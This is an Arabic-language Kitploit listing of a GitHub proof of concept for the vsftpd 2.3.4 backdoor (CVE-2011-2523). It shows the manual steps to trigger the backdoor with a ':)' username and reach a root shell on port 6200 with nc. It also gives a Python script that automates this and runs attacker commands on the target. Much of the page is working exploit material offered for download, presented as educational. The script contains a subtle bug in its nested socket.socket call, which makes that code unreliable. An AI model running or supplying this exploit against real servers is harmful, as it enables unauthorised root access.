Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/tshaq17/vsftpd-2.3.4---backdoor-command-execution
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubtshaq17/vsftpd-2.3.4---backdoor-command-execution

vsftpd-2.3.4---Backdoor-Command-Execution

vsftpd 2.3.4 (CVE-2011-2523) هي ثغرة أمنية حرجة تؤدي إلى الحصول على شل جذر عكسي. في هذا المستودع سأقوم بعمل إثبات للمفهوم (PoC) لكيفية استغلالها خطوة بخطوة، يدويًا وتلقائيًا (باستخدام Python) لأغراض تعليمية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

vsftpd-2.3.4---Backdoor-Command-Execution

vsftpd 2.3.4 (CVE-2011-2523) هي ثغرة حرجة تؤدي إلى Root Shell. في هذا المستودع سأقوم بتقديم Proof of Concept لكيفية استغلالها خطوة بخطوة، يدويًا وآليًا (باستخدام Python) لأغراض تعليمية.

ما هي الثغرة؟ أولًا، هي استغلال من جانب الخادم (server-side) لذا سنقوم باستغلالها عن بُعد. الفكرة هي أنه عند الاتصال بخدمة FTP على المنفذ 21 بشكل افتراضي باستخدام اسم مستخدم يحتوي على :) سيؤدي ذلك إلى تشغيل النظام لفتح منفذ TCP 6200 مع Root Shell، بحيث يمكن لأي شخص الاتصال به والحصول على صلاحيات الجذر (Root) على الخادم الهدف، وهو أمر كارثي. لذا دعونا نقوم بذلك عمليًا خطوة بخطوة. سأشرح ذلك يدويًا أولاً للحصول على الفكرة الكاملة، ثم يوجد سكربت Python لاستغلالها تلقائيًا.

يدويًا

فحص المنافذ

  1. المنفذ 21 مفتوح
root@kitploit:~
nmap -p21 -sV -sC -O Target_IP 
صورة
  1. المنفذ 6200 مغلق
root@kitploit:~
nmap -p6200 Target_IP
  • المنفذ 6200 مغلق حاليًا صورة

الاستغلال

  1. الاتصال بخدمة FTP واستخدام اسم مستخدم خبيث لتشغيل النظام لفتح المنفذ 6200
root@kitploit:~
ftp Target_IP 
  • اسم المستخدم: أي شيء:)
  • كلمة المرور: أي شيء صورة
  1. التحقق من المنفذ 6200 بعد اتصال FTP
root@kitploit:~
nmap -p6200 Target_IP

المنفذ 6200 مفتوح الآن، لذا هذا هو بابنا الخلفي

صورة
  1. الاتصال بالمنفذ 6200 للحصول على Root Shell على الخادم بالكامل
root@kitploit:~
nc -nv Target_IP 6200

أخيرًا، حصلنا على Root Shell على الجهاز الهدف. صورة


تلقائيًا

بعد أن قمنا بذلك يدويًا، نعرف خطوات الاستغلال:

  1. الاتصال بخادم FTP على المنفذ (21).
  2. استخدام اسم مستخدم يحتوي على :) لتفعيل الباب الخلفي.
  3. الاتصال بالمنفذ (6200).
root@kitploit:~
#!/usr/bin/python3 

from ftplib import FTP
import socket
import sys
import time

Target_IP = sys.argv[1]
cmd = sys.argv[2]

# Step1: Connect to FTP
try:
  ftp = FTP(Target_IP,timeout=2)
  ftp.login("user:)","password") # Step2: Send the malicious username
except:
  pass

time.sleep(1) # To give a time for the server to open the port (6200)

#Step3: Connect to port (6200) to have a Root Shell
shell = socket.socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
try:
  shell.connect((Target_IP,6200))
except:
  print("Shell Failed")

#Execute the commands
shell.send(cmd.encode() + b"\n")
print(shell.recv(4096).decode())

#Finally close the connection
shell.close()
تنزيل الأداة